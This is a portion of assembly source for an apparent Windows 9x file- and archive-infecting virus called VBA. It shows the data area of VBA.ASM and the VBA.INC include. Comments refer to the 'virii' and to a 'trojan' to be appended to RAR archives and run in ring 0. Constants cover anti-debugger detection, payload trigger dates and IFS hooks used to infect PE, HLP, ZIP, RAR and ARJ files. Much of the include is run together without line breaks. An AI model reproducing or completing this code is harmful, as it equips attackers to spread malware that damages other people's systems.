        DB      (LEN_UUD+2*LEN_RDROP_CON) DUP (?)
        ORG     AREA_COMMON_1
        GOFF    IO_BUFFER
        DB      LEN_IOBUFF DUP (?)
        ORG     AREA_COMMON_1
        GOFF    OUR_ARJ_FHEADER
        ARJ_HDR_STRUC <>
        DB      MAX_PATH DUP (?)
        DB      8 DUP (?)
        ORG     AREA_COMMON_1
        GOFF    OUR_HA_FHEADER
        HA_FILE_HEADER <>
        DB      MAX_DOS_PATH DUP (?)
        ORG     AREA_COMMON_1
        GOFF    OUR_RAR_FHEADER
        RAR_FILE_HDR <>
        DB      MAX_PATH DUP (?)
ORG AREA_COMMON_1
; ZIP work area (overlaid on AREA_COMMON_1 like the other archive buffers).
; ZIP_CUR_OFF/ZIP_CENTRAL_OFF are file offsets, ZIP_FILE_COUNTER the number
; of entries seen, ZIP_EXEC_FLAG the "template executable taken" flag tested
; by TEST_EXEC_SPEC and CHECK_ARCOUNT.  SIZE_ARC_AREA covers all of them.
OUR_LOCAL_HEADER_RELO:
        GOFF    OUR_LOCAL_HEADER
        ZIP_LOCAL_HEADER <>
        DB      MAX_PATH DUP (?)
        GOFF    OUR_CENTRAL_HEADER
        ZIP_CENTRAL_HEADER <>
        DB      MAX_PATH DUP (?)
        GOFF    ZIP_CUR_OFF
        DD      ?
        GOFF    ZIP_CENTRAL_OFF
        DD      ?
        GOFF    ZIP_FILE_COUNTER
        DD      ?
        GOFF    ZIP_EXEC_FLAG
        DB      ?
SIZE_ARC_AREA   = $-OUR_LOCAL_HEADER_RELO
        GOFF    INSERT_BUFF
        DB      LEN_IOBUFF DUP (?)
; AREA_COMMON_2 overlays: find data, HLP header/directory, ZIP end-record
; buffer, and the PE headers + object table of the file being processed.
AREA_COMMON_2:
        GOFF    FIND_DATA
        _WIN32_FIND_DATA <>
        ORG     AREA_COMMON_2
        GOFF    HLP_HEADER
        HLP_START <>
        GOFF    HLP_DIRECTORY
        DB      LEN_HLP_DIR DUP (?)
        ORG     AREA_COMMON_2
        GOFF    BUFF_ZIP_HEADER
        ZIP_CENTRAL_HEADER <>
        DB      MAX_PATH DUP (?)
        ORG     AREA_COMMON_2
        GOFF    HEADER
        DOS_HEADER <>
        GOFF    PHEADER
        PE_HEADER <>
        GOFF    OTABLE
        OBJECT_TABLE MAX_OBJS DUP (<>)
; AREA_COMMON_3: state of the polymorphic engine (SPE.ASI) - register
; bookkeeping and decryptor generation buffers.  SPE32_BUFF re-uses the
; SPE_COMMON area for the 32-bit variant.
AREA_COMMON_3:
        GOFF    PUSHED_REGS
        DW      ?
        DB      4 DUP (?)
        GOFF    SHIT_FLAG
        DB      ?
        GOFF    DIRTY_SREG
        DB      ?
        GOFF    DIRTY_WREG
        DB      ?                               ;XXX1XXXX (1-USED,0-UNUSED)
                                                ;       ^AX
                                                ;      ^CX
                                                ;     ^DX
                                                ;    ^BX
                                                ;  ^BP
                                                ; ^SI
                                                ;^DI
        GOFF    WREG_LIST
        DB      8 DUP (?)                       ;VALID REGISTER LIST
SPE_COMMON:
        GOFF    ADDRESS_MODE
        DW      ?                               ;IF (HIBYTE)=0FFH THEN SHORT
        GOFF    OFF_VALUE
        DD      ?                               ;OFFSET VALUE
        GOFF    DELTA_VALUE
        DD      ?                               ;DELTA VALUE IN [OFF_REG+DELTA]
        GOFF    MASK_VALUE
        DD      ?                               ;MASK VALUE
        GOFF    TOP_ADDRESS
        DD      ?                               ;ADDRESS OF TOP DWORD
        GOFF    DEC_OFF_COUNT
        DB      ?                               ;DECREMENT OFF_REG COUNTER
        GOFF    OFF_REG
        DB      ?                               ;OFFSET REGISTER
        GOFF    COUNT_REG
        DB      ?                               ;COUNTER REGISTER
        GOFF    MASK_REG
        DB      ?                               ;MASK REGISTER
        GOFF    WORK_REG
        DB      ?                               ;WORK REGISTER
        GOFF    STORE_WR_FLAG
        DB      ?                               ;STORING WORK_REG FLAG
        GOFF    CHG_WR_FLAG
        DB      ?                               ;CHANGING WORK_REG FLAG
        GOFF    SET_WR_FLAG
        DB      ?                               ;SETTING WORK_REG FLAG
        GOFF    DEC_ESP_COUNT
        DB      ?                               ;DECREMENT ESP COUNTER
        GOFF    WORD_MODE
        DB      ?                               ;WORD (1) OR DWORD (0) MODE
        GOFF    SPE32_BUFF
        ORG     SPE_COMMON
        GOFF    ADDRESS_EMPTY
        DW      ?
        GOFF    ADDRESS_BUFF
        DW      LEN_DECRYPTOR DUP (?)           ;BUFFER FOR ADDRESSES
        GOFF    LEN_SEEK
        DW      ?
        GOFF    SEEK_TABLE
        DB      LEN_DECRYPTOR+1 DUP (?)         ;FOR CHOOSE DECRYPTOR BYTES
        GOFF    TEMP_DECRYPTOR
        DB      LEN_DECRYPTOR DUP (?)           ;TEMPORARY DECRYPTOR BUFFER
        GOFF    ENCRYPT_BUFF
        DB      LEN_MAIN_BUFF DUP (?)           ;WORK BUFFER
; MAIN_BUFF is the dword-aligned image buffer (body + decryptor + padding);
; VXD_NAME receives names from the _GETVXDNAME service (TEST_VXD).
; TOTAL_LEN/TOTAL_PAGE_NUM size the resident allocation in MAKE_INSTALL.
        GOFF    SET_ALIGN
SET_ALIGN_NEW   = (((SET_ALIGN+3) AND (NOT 3))-END_CODE16)
        ORG     SET_ALIGN_NEW                   ;ALIGN 4 (GLOBAL)
        GOFF    MAIN_BUFF
IMM_MBUFF:      DB ((OUR_LEN+100H+1+LEN_LOADER+3)/4)*4 DUP (?)  ;100H-MAX LENGTH OF END SHIT
SIZE_MBUFF      = $-IMM_MBUFF
        GOFF    VXD_NAME
        DB      MIN_VXDNAME_SIZE DUP (?)
        GOFF    TOTAL_LEN
TOTAL_PAGE_NUM  = (TOTAL_LEN+0FFFH)/1000H
ENDS
END START
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[VBA.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[VBA.INC]ÄÄÄ
COMMENT /
(C) VBA Ltd. ALL RIGHTS RESERVED. E-mail: support@vba.com.by
THIS PROGRAM IS FREE FOR COMMERCIAL AND NON-COMMERCIAL USE. REDISTRIBUTION AND
USE IN SOURCE AND BINARY FORMS, WITH OR WITHOUT MODIFICATION, ARE PERMITTED.
THIS SOFTWARE IS PROVIDED BY VBA LTD. ``AS IS'' AND ANY EXPRESS OR IMPLIED
WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
/
;DEBUG = 1                      ;COMMENTED IF RELEASE \
                                ;UNCOMMENTED IF DEBUG
; Build-time constants.  The HAPPY_* / *_PSBL values appear to be payload
; date and probability settings used by code outside this chunk - verify
; against the trigger code.  WE_HERE / OUR_PORT are the residency-probe
; values answered by IO_CALLBACK; STACK_FRAME is the ENTERD frame size
; VXD_CALL builds its INT 20H thunk in.
HAPPY_YEAR      = 1999
HAPPY_MONTH     = 7
HAPPY_POSSIBLITY = 6
MSG_POSSIBLITY  = 48
NOCHNG_SATT_PSBL = 4
CHNG_SNAME_PSBL = 8
WAIT_TIME       = 3                             ;SEC
SLEEP_TIME      = 1                             ;MIN
MAX_OBJS        = 20
MIN_ARC_FILES   = 10                            ; minimum entries before an archive is touched (CHECK_ARCOUNT)
WE_HERE         = '!'                           ; byte returned by IO_CALLBACK when resident
OUR_PORT        = 'SK'                          ; I/O port hooked by Install_IO_Handler
STACK_FRAME     = 6                             ; INT 20H (2) + service id (4)
TROJAN_NAME_SIZE = 4+1+3                        ;XXXX.XXX (FOR EXAMPLE,TEST.TST)
TROJAN_STAMP    = 0FFH                          ;DATE STAMP: 07/31/1980 (0FFH) AND
                                                ;LOBYTE(TIME)=0, FOR EXAMPLE,00:00:00
;ALSO RAR ARCHIVE MUST HAVE A DATE <= 2 WEEK AGE AT CURRENT DATE.
;NOTE: TROJAN MUST BE APPENED TO A RAR ARCHIVE BY "STORED" METHOD. TROJAN MUST ;PRESERVE DS,ES,SS,ESP,EBP,EBX,EDX REGISTERS AND HAVE IMAGE OF 32BIT SUBROUTINE ;(LAST COMMAND - RETN). ALSO TROJAN MUST HAVE LENGTH <= 2000H BYTES. ;ON TROJAN ENTRY: ;EDX=BEGIN VIRII MEMORY REGION,ESI=BEGIN OF TROJAN,EBP=STACK FRAME FOR VIRII ;INTERNAL VXD CALLS (SEE VXD_CALL SUBROUTINE IN VIRII CODE,YOU MAY ALSO INCLUDE ;THIS SUBROUTINE TO TROJAN FOR EFFECTIVE CALLING VXD SERVICES),DS,ES,SS,CS= ;RING0 FLAT. LEN_LOADER = ((168+3)/4)*4 LEN_IOBUFF = 400H LEN_HLP_DIR = 100H+SIZE DOS_HEADER LEN_MAIN_BUFF = 0A00H LEN_PEND_JUNK = 80H LEN_FILL_CRYPT = 12 LEN_FILL_RESTORE= 4*7 MIN_VXDNAME_SIZE= 80 HLP_LEN_LINE = 102 MIN_RELOC_SIZE = 0A00H GET_CUR_VM_HANDLE = 18001H ;VMM GET_SYSTEM_TIME = 1803FH _PAGEFREE = 18055H ALLOCATE_GDT_SELECTOR = 18076H FREE_GDT_SELECTOR = 18077H HOOK_DEVICE_SERVICE = 18090H INSTALL_IO_HANDLER = 18096H GET_CONFIG_DIRECTORY = 180B7H FATAL_ERROR_HANDLER = 180BEH _PAGERESERVE = 1811DH _PAGECOMMIT = 1811EH _ENTERMUSTCOMPLETE = 18135H _LEAVEMUSTCOMPLETE = 18136H GET_DDB = 18146H _GETVXDNAME = 1817EH GET_DATE_AND_TIME = 58008H ;VTD SHELL_MESSAGE = 178004H ;SHELL GET_DOSTIME = 408007H ;IFSMGR RING0_FILEIO = 408032H UNITOBCSPATH = 408041H INSTALLAPIHOOK = 408067H REMOVEAPIHOOK = 408068H WINICE_ID = 202H BCHECKER_ID = 205H IMMUNER_ID = 534BH SIWVID_ID = 7A5FH EF_HANG_ON_EXIT = 1 BYTE_INPUT = 0 BLOCK_SVC_INTS = 1 BLOCK_THREAD_IDLE = 10H PR_FIXED = 8 PR_SYSTEM = 80080000H PC_WRITEABLE = 20000H PC_FIXED = 8 PD_FIXEDZERO = 3 MAX_PATH = 260 MAX_DOS_PATH = 128 IFSFN_WRITE = 1 IFSFN_CLOSE = 11 IFSFN_FILEATTRIB = 33 IFSFN_OPEN = 36 IFSFN_RENAME = 37 IFSFH_RES_UNC = 1 IFSFH_RES_NETWORK = 8 IFSFH_RES_LOCAL = 10H IFSFH_RES_CFSD = 80H ACCESS_READONLY = 0 ACCESS_WRITEONLY = 1 ACCESS_READWRITE = 2 ACTION_CREATENEW = 10H ACTION_REPLACEEXISTING = 2 ACTION_CREATEALWAYS = 12H ACTION_OPENALWAYS = 11H ACTION_OPENEXISTING = 1 R0_NO_CACHE = 100H OPEN_FLAGS_REOPEN = 800H R0_SWAPPER_CALL = 1000H 
OPEN_FLAGS_COMMIT = 4000H FILE_FLAG_WILDCARDS = 80000000H FA_READONLY = 1 FA_SYSTEM = 4 FA_LABEL = 8 FA_DIRECTORY = 10H FA_DEVICE = 40H FGET_ATTRIBUTES = 0 ; GET ATTRIBUTES OF FILE/DIR FSET_ATTRIBUTES = 1 ; SET ATTRIBUTES OF FILE/DIR SET_ATTRIB_MODIFY_DATETIME = 3 SET_ATTRIB_LAST_ACCESS_DATETIME = 5 SET_ATTRIB_CREATION_DATETIME = 7 OPEN_ACCESS_READONLY = 0 OPEN_ACCESS_WRITEONLY = 1 OPEN_ACCESS_READWRITE = 2 OPEN_ACCESS_RO_NOMODLASTACCESS = 4 OPEN_SHARE_DENYREADWRITE = 10H OPEN_SHARE_DENYWRITE = 20H OPEN_FLAGS_NOCRITERR = 2000H FILE_OPEN = 1 FILE_CREATE = 10H FILE_TRUNCATE = 2 R0_OPENCREATFILE = 0D500H ; OPEN/CREATE A FILE R0_READFILE = 0D600H ; READ A FILE, NO CONTEXT R0_WRITEFILE = 0D601H ; WRITE TO A FILE, NO CONTEXT R0_CLOSEFILE = 0D700H ; CLOSE A FILE R0_GETFILESIZE = 0D800H ; GET SIZE OF A FILE R0_FINDFIRSTFILE = 4E00H ; DO A LFN FINDFIRST OPERATION R0_FINDNEXTFILE = 4F00H ; DO A LFN FINDNEXT OPERATION R0_FINDCLOSEFILE = 0DC00H ; DO A LFN FINDCLOSE OPERATION R0_FILEATTRIBUTES = 4300H ; GET/SET ATTRIBUTES OF A FILE R0_DELETEFILE = 4100H ; DELETE A FILE R0_GETDISKFREESPACE = 3600H ; GET DISK FREE SPACE IOREQ STRUC IR_LENGTH DD ? ;0 LENGTH OF USER BUFFER IR_FLAGS DB ? ;4 MISC. STATUS FLAGS IR_USER DB ? ;5 USER ID FOR THIS REQUEST IR_SFN DW ? ;6 SYSTEM FILE NUMBER OF FILE HANDLE IR_PID DD ? ;8 PROCESS ID OF REQUESTING TASK IR_PPATH DD ? ;C UNICODE PATHNAME IR_AUX1 DD ? ;10 SECONDARY USER DATA BUFFER (CURDTA) IR_DATA DD ? ;14 PTR TO USER DATA BUFFER IR_OPTIONS DW ? ;18 REQUEST HANDLING OPTIONS IR_ERROR DW ? ;1A ERROR CODE (0 IF OK) IR_RH DD ? ;1C RESOURCE HANDLE IR_FH DD ? ;20 FILE (OR FIND) HANDLE IR_POS DD ? ;24 FILE POSITION FOR REQUEST IR_AUX2 DD ? ;28 MISC. EXTRA API PARAMETERS IR_UPATH DD ? ;2C MISC. EXTRA API PARAMETERS IR_PEV DD ? ;30 PTR TO IFSMGR EVENT FOR ASYNC REQUESTS IR_FSD DB 64 DUP (?) 
;34 PROVIDER WORK SPACE ENDS IR_SIZE EQU IR_POS IR_ATTR2 EQU IR_POS ; DESTINATION ATTRIBUTES FOR RENAME IR_ATTR EQU IR_LENGTH ; DOS FILE ATTRIBUTE INFO IR_DATETIME EQU IR_AUX2 ; OVERLAYED ON RETURN FROM FSD PATH_ELEMENT STRUC PE_LENGTH DW ? PE_UNICHARS DW ? ENDS PARSED_PATH STRUC PP_TOTALLENGTH DW ? PP_PREFIXLENGTH DW ? PP_ELEMENTS DB 4 DUP (?) ENDS BCS_WANSI = 0 ; USE WINDOWS ANSI SET _FILETIME STRUC DWLOWDATETIME DD ? DWHIGHDATETIME DD ? ENDS DOS_TIME STRUC DT_TIME DW ? DT_DATE DW ? ENDS _WIN32_FIND_DATA STRUC DWFILEATTRIBUTES DD ? FTCREATIONTIME DB (SIZE _FILETIME) DUP (?) FTLASTACCESSTIME DB (SIZE _FILETIME) DUP (?) FTLASTWRITETIME DB (SIZE _FILETIME) DUP (?) NFILESIZEHIGH DD ? NFILESIZELOW DD ? DWRESERVED0 DD ? DWRESERVED1 DD ? CFILENAME DW MAX_PATH DUP (?) ; INCLUDES NULL CALTERNATEFILENAME DW 14 DUP (?) ; INCLUDES NULL ENDS _TYPE RECORD RES:1,DPL:2,SYSORNOT:1,STYPE:4 SEL STRUC SEL_LIMIT_LOW DW ? SEL_BASE_LOW DW ? SEL_BASE_LOWH DB ? SEL_TYPE _TYPE <> SEL_LIMIT_HIGH DB ? SEL_BASE_HIGH DB ? ENDS GOFF MACRO LBL,DELTA IFNB LBL EQU $-START_CODE32+END_CODE16-DELTA ELSE LBL EQU $-START_CODE32+END_CODE16 ENDIF ENDM BREAK MACRO IFDEF DEBUG INT 3 ENDIF ENDM ;PE FILES SECTION PE_FLAG_NOT_FIXUP = 1 PE_FLAG_EXECUTABLE = 2 PE_FLAG_32BIT = 100H PE_FLAG_DLL = 2000H OT_FLAG_CODE = 20H OT_FLAG_IDATA = 40H OT_FLAG_UDATA = 80H OT_FLAG_DISCARDABLE = 02000000H OT_FLAG_NOTCACHED = 04000000H OT_FLAG_NONPAGED = 08000000H OT_FLAG_SHARED = 10000000H OT_FLAG_EXECUTE = 20000000H OT_FLAG_READ = 40000000H OT_FLAG_WRITE = 80000000H DOS_HEADER STRUC DOSH_SIGNATURE DW ? ; 'MZ' DOSH_CBLP DW ? DOSH_CP DW ? DOSH_CRLC DW ? DOSH_CPARHDR DW ? DOSH_MINALLOC DW ? DOSH_MAXALLOC DW ? DOSH_SS DW ? DOSH_SP DW ? DOSH_CSUM DW ? DOSH_IP DW ? DOSH_CS DW ? DOSH_LFARLC DW ? ; RELOCATION TABLE ADDRESS DOSH_OVNO DW ? DOSH_RES DW 4 DUP (?) DOSH_OEMID DW ? DOSH_OEMINFO DW ? DOSH_RES2 DW 10 DUP (?) DOSH_LFANEW DW ? ; NEW EXE HEADER ADDRESS ENDS SD STRUC SD_RVA DD ? SD_SIZE DD ? 
ENDS PE_HEADER STRUC PEH_SIGNATURE DD ? ;PE,0,0 PEH_CPUTYPE DW ? ;<=162H PEH_NUMOFOBJECT DW ? PEH_TIMEDATE DD ? PEH_COFFPOINTER DD ? PEH_COFFSIZE DD ? PEH_NTHSIZE DW ? PEH_FLAGS DW ? PEH_MAGIC DW ? PEH_LINKMAJOR DB ? PEH_LINKMINOR DB ? PEH_CODESIZE DD ? PEH_IDATASIZE DD ? PEH_UDATASIZE DD ? PEH_ENTRYPOINT DD ? PEH_CODEBASE DD ? PEH_DATABASE DD ? PEH_IMAGEBASE DD ? PEH_OBJALIGN DD ? PEH_FILEALIGN DD ? PEH_OSMAJOR DW ? PEH_OSMINOR DW ? PEH_USERMAJOR DW ? PEH_USERMINOR DW ? PEH_SUBMAJOR DW ? PEH_SUBMINOR DW ? PEH_RESERVED1 DD ? PEH_IMAGESIZE DD ? PEH_HEADERSIZE DD ? PEH_FILECRC DD ? PEH_SUBSYSTEM DW ? PEH_DLLFLAGS DW ? PEH_STACKRES DD ? PEH_STACKCOM DD ? PEH_HEAPRES DD ? PEH_HEAPCOM DD ? PEH_LOADFLAGS DD ? PEH_NUMRVA DD ? ;10H PEH_EXPORT SD ? PEH_IMPORT SD ? PEH_RESOURCE SD ? PEH_EXEPTION SD ? PEH_SECURITY SD ? PEH_FIXUP SD ? PEH_DEBUG SD ? PEH_DESCRIPT SD ? PEH_MACHINE SD ? PEH_TLSRVA SD ? PEH_LCONFIG SD ? PEH_RESERVED2 SD ? PEH_IATRVA SD ? PEH_BOUNDIMPORT SD ? PEH_RESERVED3 SD ? PEH_RESERVED4 SD ? ENDS OBJECT_TABLE STRUC OT_NAME DB 8 DUP (?) OT_VIRTSIZE DD ? OT_RVA DD ? OT_PHYSICALSIZE DD ? OT_PHYSICALOFF DD ? OT_RESERVED DB 0CH DUP (?) OT_FLAGS DD ? ENDS ;WINDOWS HELP FILE (HLP) HLP_MAGIC = 35F3FH HLP_SH_MAGIC = 36CH ID_CONFIG = 4 HLP_START STRUC HLP_START_MAGIC DD ? ;35F3FH HLP_START_DIRECTORYSTART DD ? ;OFFSET OF FILE_HEADER OF INTERNAL DIRECTORY HLP_START_FIRSTFREEBLOCK DD ? ;OFFSET OF FREE_HEADER OR -1L IF NO FREE LIST HLP_START_ENTIREFILESIZE DD ? ;SIZE OF ENTIRE HELP FILE IN BYTES ;CHAR HELPFILECONTENT[ENTIREFILESIZE-16] THE REMAINDER OF THE HELP FILE ENDS FILE_HEADER STRUC FILE_HEADER_RESERVEDSPACE DD ? ;SIZE RESERVED INCLUDING FILE_HEADER FILE_HEADER_USEDSPACE DD ? ;SIZE OF INTERNAL FILE IN BYTES FILE_HEADER_FILEFLAGS DB ? ;NORMALLY 4 ;DB FILECONTENT DUP (USEDSPACE) THE BYTES CONTAINED IN THE INTERNAL FILE ;DB FREESPACE DUP (RESERVEDSPACE-USEDSPACE-9) ENDS SYSTEM_HEADER STRUC ;|SYSTEM SYSTEM_HEADER_MAGIC DW ? ;36CH SYSTEM_HEADER_MINOR DW ? 
;HELP FILE FORMAT VERSION NUMBER ;15 = HC30 WINDOWS 3.0 HELP FILE ;21 = HC31 WINDOWS 3.1 HELP FILE ;27 = WMVC/MMVC MEDIA VIEW FILE ;33 = MVC OR HCW 4.00 WINDOWS 95 SYSTEM_HEADER_MAJOR DW ? ;1 SYSTEM_HEADER_GENDATE DD ? ;HELP FILE CREATED SECONDS AFTER 1.1.1980, OR 0 SYSTEM_HEADER_FLAGS DW ? ;USE MINOR AND FLAGS TO FIND OUT HOW THE HELP FILE WAS COMPRESSED: ;MINOR <= 16 NOT COMPRESSED, TOPICBLOCKSIZE 2K ;MINOR > 16 FLAGS=0: NOT COMPRESSED, TOPICBLOCKSIZE 4K ; FLAGS=4: LZ77 COMPRESSED, TOPICBLOCKSIZE 4K ; FLAGS=8: LZ77 COMPRESSED, TOPICBLOCKSIZE 2K ;ADDITIONALLY THE HELP FILE MAY USE PHRASE COMPRESSION (OLDSTYLE OR HALL). ;IF MINOR IS 16 OR LESS, THE HELP FILE TITLE FOLLOWS THE SYSTEMHEADER: ;HELPFILETITLE DB ? DUP (?) - ASCIZ STRING ;IF MINOR IS ABOVE 16, ONE OR MORE SYSTEMREC RECORDS FOLLOW INSTEAD UP TO THE ;INTERNAL END OF THE |SYSTEM FILE: ;SYSTEM_HEADER_RECORDTYPE DW ? ;TYPE OF DATA IN RECORD ;SYSTEM_HEADER_DATASIZE DW ? ;SIZE OF DATA ;SYSTEM_HEADER_DATA DB ? ;DATASIZE DUP (?) ;THERE ARE DIFFERENT RECORDTYPES DEFINED, EACH STORING DIFFERENT DATA. ;THEY MAINLY CONTAIN WHAT WAS SPECIFIED IN THE HELP PROJECT FILE. ;RECORDTYPE DATA ;1 TITLE ASCIZ TITLE HELP FILE TITLE ;2 COPYRIGHT ASCIZ COPYRIGHT COPYRIGHT NOTICE SHOWN IN ABOUTBOX ;3 CONTENTS TOPICOFFSET CONTENTS TOPIC OFFSET OF STARTING TOPIC ;4 CONFIG ASCIZ MACRO ALL MACROS EXECUTED ON OPENING ;5 ICON WINDOWS *.ICO FILE SEE WIN31WH ON ICON FILE FORMAT ;6 WINDOW STRUCT WINDOWS DEFINED IN THE HPJ-FILE ;7 WINDOW TYPEDEF STRUCT VIEWER 2.0 WINDOWS DEFINED IN MVP-FILE ;8 CITATION ASCIZ CITATION THE CITATION PRINTED ;9 LCID DW LCID[4] LANGUAGE ID, WINDOWS 95 (HCW 4.00) ;10 CNT ASCIZ CONTENTFILENAME CNT FILE NAME, WINDOWS 95 (HCW 4.00) ;11 CHARSET DW CHARSET CHARSET, WINDOWS 95 (HCW 4.00) ;12 DEFFONT STRUCT DEFAULT DIALOG FONT, WINDOWS 95 (HCW 4.00) ;12 FTINDEX ASCIZ DTYPE MULTIMEDIA HELP FILES DTYPES ;13 GROUPS ASCIZ GROUP DEFINED GROUPS, MULTIMEDIA HELP FILE ;14 INDEX_S. 
ASCIZ INDEXSEPARATORS SEPARATORS, WINDOWS 95 (HCW 4.00) ;14 KEYINDEX STRUCT MULTIMEDIA HELP FILES ;18 LANGUAGE ASCIZ LANGUAGE DEFINED LANGUAGE, MULTIMEDIA HELP FILES ;19 DLLMAPS STRUCT DEFINED DLLMAPS, MULTIMEDIA HELP FILES ENDS ;RAR ARCHIVE RAR_SIGN = 21726152H RAR_HEAD_SIGN = 73H RAR_FILE_SIGN = 74H RAR_STORED = 30H RAR_HEAD_HDR STRUC RAR_HEAD_CRC DW ? ;TYPE - RESERVED2 RAR_HEAD_TYPE DB ? ;73H RAR_HEAD_FLAGS DW ? ; 0x01 - VOLUME ATTRIBUTE (ARCHIVE VOLUME) ; 0x02 - ARCHIVE COMMENT PRESENT ; 0x04 - ARCHIVE LOCK ATTRIBUTE ; 0x08 - SOLID ATTRIBUTE (SOLID ARCHIVE) ; 0x10 - UNUSED ; 0x20 - AUTHENTICITY INFORMATION PRESENT RAR_HEAD_SIZE DW ? RAR_RESERVED1 DW ? RAR_RESERVED2 DD ? ENDS ;COMMENT BLOCK PRESENT IF (HEAD_FLAGS & 0x02) != 0 RAR_FILE_HDR STRUC RAR_F_HEAD_CRC DW ? ;0 RAR_F_HEAD_TYPE DB ? ;2 74H RAR_F_HEAD_FLAGS DW ? ;3 ; 0x01 - FILE CONTINUED FROM PREVIOUS VOLUME ; 0x02 - FILE CONTINUED IN NEXT VOLUME ; 0x04 - FILE ENCRYPTED WITH PASSWORD ; 0x08 - FILE COMMENT PRESENT ; 0x10 - INFORMATION FROM PREVIOUS FILES IS USED (SOLID FLAG) ; (FOR RAR 2.0 AND LATER) ; BITS 7 6 5 (FOR RAR 2.0 AND LATER) ; 0 0 0 - DICTIONARY SIZE 64 KB ; 0 0 1 - DICTIONARY SIZE 128 KB ; 0 1 0 - DICTIONARY SIZE 256 KB ; 0 1 1 - DICTIONARY SIZE 512 KB ; 1 0 0 - DICTIONARY SIZE 1024 KB ; 1 0 1 - RESERVED ; 1 1 0 - RESERVED ; 1 1 1 - FILE IS DIRECTORY ; (HEAD_FLAGS & 0x8000) == 1, BECAUSE FULL ; BLOCK SIZE IS HEAD_SIZE + PACK_SIZE RAR_F_HEAD_SIZE DW ? ;5 RAR_COMPRESSED_SIZE DD ? ;7 RAR_ORIGINAL_SIZE DD ? ;B RAR_HOST_OS DB ? ;F DOS=0,WIN32=2 RAR_CRC32 DD ? ;10 RAR_FILE_TIME DW ? ;14 RAR_FILE_DATE DW ? ;16 RAR_REQ_VER DB ? ;18 0FH RAR_METHOD DB ? ;19 30H=STORED RAR_FNAME_SIZE DW ? ;1A RAR_FILE_ATTRIB DD ? ;1C RAR_FNAME LABEL BYTE ;20 ENDS ;FILE_NAME FILE NAME - STRING OF NAME_LEN BYTES SIZE ;COMMENT BLOCK PRESENT IF (HEAD_FLAGS & 0x08) != 0 ;???? 
OTHER EXTRA INCLUDED BLOCKS - RESERVED FOR FUTURE USE ;ZIP ARCHIVE ZIP_LOCAL_SIGN = 4034B50H ZIP_CENTRAL_SIGN = 2014B50H ZIP_END_SIGN = 6054B50H ZIP_LOCAL_HEADER STRUC ZIP_LOC_SIGN_ DD ? ;0 ('PK',3,4) ZIP_VER_NED_TO_EXTR DW ? ;4 ZIP_FLAGS DW ? ;6 ZIP_COMPRESSION_METHOD DW ? ;8 (0 FOR STORED) ZIP_FILE_TIME DW ? ;A ZIP_FILE_DATE DW ? ;C ZIP_CRC_32 DD ? ;E ZIP_COMPRESSED_SIZE DD ? ;12 ZIP_UNCOMPRESSED_SIZE DD ? ;16 ZIP_SIZE_FNAME DW ? ;1A ZIP_EXTRA_FIELD_LENGTH DW ? ;1C ZIP_LOCAL_FNAME LABEL BYTE ;1E ENDS ;EXTRA FIELD (VARIABLE SIZE) ZIP_CENTRAL_HEADER STRUC ZIP_CENTR_SIGN_ DD ? ;0 ('PK',1,2) ZIP_VER_MADE_BY_ DW ? ;4 ZIP_VER_NED_TO_EXTR_ DW ? ;6 ZIP_FLAGS_ DW ? ;8 ZIP_COMPRESSION_METHOD_ DW ? ;A ZIP_FILE_TIME_ DW ? ;C ZIP_FILE_DATE_ DW ? ;E ZIP_CRC_32_ DD ? ;10 ZIP_COMPRESSED_SIZE_ DD ? ;14 ZIP_UNCOMPRESSED_SIZE_ DD ? ;18 ZIP_SIZE_FNAME_ DW ? ;1C ZIP_EXTRA_FIELD_LENGTH_ DW ? ;1E ZIP_FILE_COMMENT_LENGTH_ DW ? ;20 ZIP_DISK_NUMBER_START_ DW ? ;22 ZIP_INTRNL_FILE_ATTR_ DW ? ;24 ZIP_EXTRNL_FILE_ATTR_ DD ? ;26 ZIP_REL_OFF_OF_LOC_HDR_ DD ? ;2A ZIP_CENTRAL_FNAME LABEL BYTE ;2E ENDS ;EXTRA FIELD (VARIABLE SIZE) ;FILE COMMENT (VARIABLE SIZE) ZIP_END_HEADER STRUC ZIP_END_SIGN_ DD ? ;0 ('PK',5,6) NUM_OF_THIS_DISK DW ? ;4 NUM_OF_THE_START_DISK DW ? ;6 TTL_NUM_OF_ENT_ON_THIS_DISK DW ? ;8 TTL_NUM_OF_ENT_IN_THE_CENT_DIR DW ? ;A SIZE_OF_THE_CENTRAL_DIRECTORY DD ? ;C OFF_OF_STRT_OF_CENT_DIRECTORY DD ? ;10 ZIPFILE_COMMENT_LENGTH DW ? ;14 ENDS ;ZIPFILE COMMENT (VARIABLE SIZE) ;16 ;ARJ ARCHIVE ARJ_SIGN = 0EA60H ARJ_STORED = 0 ARJ_HDR_STRUC STRUC ARJ_HEADER_ID DW ? ;2 HEADER ID (COMMENT AND LOCAL FILE) = 0xEA60 ARJ_BAS_HDR_SIZE DW ? ;28 BASIC HEADER SIZE (FROM 'FIRST_HDR_SIZE' THRU 'COMMENT' BELOW) ;= FIRST_HDR_SIZE + STRLEN(FILENAME) + 1 + STRLEN(COMMENT) + 1 ;= 0 IF END OF ARCHIVE ARJ_FIRST_HDR_SIZE DB ? ;1E FIRST_HDR_SIZE (SIZE UP TO 'EXTRA DATA') ARJ_VER_NUM DB ? ;06 